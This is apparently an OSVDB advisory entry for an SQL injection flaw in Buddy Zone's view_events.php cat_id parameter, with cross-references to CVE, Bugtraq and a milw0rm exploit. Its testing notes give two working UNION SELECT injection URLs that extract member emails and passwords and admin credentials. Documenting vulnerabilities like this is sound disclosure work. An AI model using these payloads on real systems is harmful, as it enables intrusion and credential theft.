Buddy Zone view_events.php cat_id Variable SQL Injection

2007-06-30T00:00:00
ID OSVDB:38961
Type osvdb
Reporter OSVDB
Modified 2007-06-30T00:00:00

Description

Manual Testing Notes

http://[target]/view_events.php?cat_id=-1//UNION//ALL//SELECT//1,2,concat(member_email,0x3a,member_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24//FROM//members/
http://[target]/view_events.php?cat_id=-1//UNION//ALL//SELECT//1,2,concat(admin_user,0x3a,admin_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24//FROM//admin_users/

References:

Related OSVDB ID: 38960
Related OSVDB ID: 38962
ISS X-Force ID: 35187
Generic Exploit URL: http://www.milw0rm.com/exploits/4128
CVE-2007-3526
Bugtraq ID: 24726